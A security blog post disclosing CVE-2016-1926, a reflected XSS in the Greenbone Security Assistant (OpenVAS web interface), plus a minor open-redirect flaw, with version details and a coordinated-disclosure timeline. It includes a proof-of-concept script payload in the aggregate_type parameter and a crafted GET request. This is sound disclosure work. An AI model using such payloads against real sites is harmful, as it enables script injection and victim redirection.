CVE-2016-1926 - XSS in the Greenbone Security Assistant

Recently Tim has been working with the software framework “OpenVAS” (“Open Vulnerability Assessment System”). This software is open source so we spent some evenings looking for bugs in the webfrontend, the Greenbone Security Assistant. After some time Sebastian found two bugs and we were able to submit those - they are fixed now.

For everybody who does not know what OpenVAS is: OpenVAS is a software for vulnerability management. You can run penetrationstests against diffrent it-systems with it and assess the results. It is also used in the Greenbone Security Manager and comes with Kali Linux.

CVE-2016-1926: XSS

If you take a look at the statistics page the following AJAX-Request is send to the backend:

1
https://[DOMAIN.tld]/omp?cmd=get_aggregate&xml=0&aggregate_type=nvt&group_column=severity&filt_id=1337&token=guest

The value aggregate_type was not escaped properly - so it was easy to trigger a XSS in the script context. You can simply set aggregate_type=nvt"-alert(document.domain)-" to get this reply:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
        DataSource ("get_aggregate",
                    {xml:1,
                     aggregate_type:"nvt"-alert(document.domain)-"",
                     group_column:"severity",
                     data_column:"",
                     filter:"",
                     filt_id:"1337"});

    title_total ("Nvts"-alert(document.domain)-" by severity",
                 "count")

Chart (gsa.data_sources ["aggregate-source"],
        gsa.generators ["aggregate-generator"],
        gsa.displays ["aggregate-display"],
        "aggregate-chart",
        "Nvt"-alert(document.domain)-" by severity",
        "/img/charts/severity-bar-chart.png",
        1,
        "",
        "");

Sadly you need to know the value of the token parameter. But if the guestmode is enabled like i.e. in the demo, it is possible to use: token=guest.

Another minor bug

The following bug was also fixed with this update. We observed the following strange behaviour:

1
2
3
GET //internetwache.org/? HTTP/1.1
Host: secinfo.greenbone.net
Connection: close

lead to

<a href="//internetwache.org/?r=1&amp;=&amp;token=guest">Login as a guest</a>

All characters of the path in the GET-request reflect to the href-attribute. Unfortunately a browser can not send a GET javascript:alert(1) request (a leading slash is required), so no way to create a XSS. However we can use the relative protocol to set an arbitrary url. Clicking the ‘Login as a guest’ link will redirect the victim to the other domain.

Details:

  • Product: Greenbone Security Assistant ≥ 6.0.0 and < 6.0.8
  • Vendor: OpenVAS
  • Risk: Low, CVSS 1.9 (AV:A/AC:M/Au:M/C:P/I:N/A:N)

The communication with Greenbone GmbH was always pleasant, transparent and to the point.

  • 07.01.2016: XSS discovered and reported to vendor.
  • 08.01.2016, 08:00: Acknowledgement from vendor and info that fix is already in progress.
  • 08.01.2016, 17:30: Fix ready, QA and testing needed
  • 09.01.2016: Update released for Greenbone Security Manager: Advisory GBSA 2016-01
  • 13.01.2016: Update released OpenVAS: Advisory OVSA 20160113
  • 18.01.2016: CVE-2016-1926 assigned by MITRE

The team of internetwache.org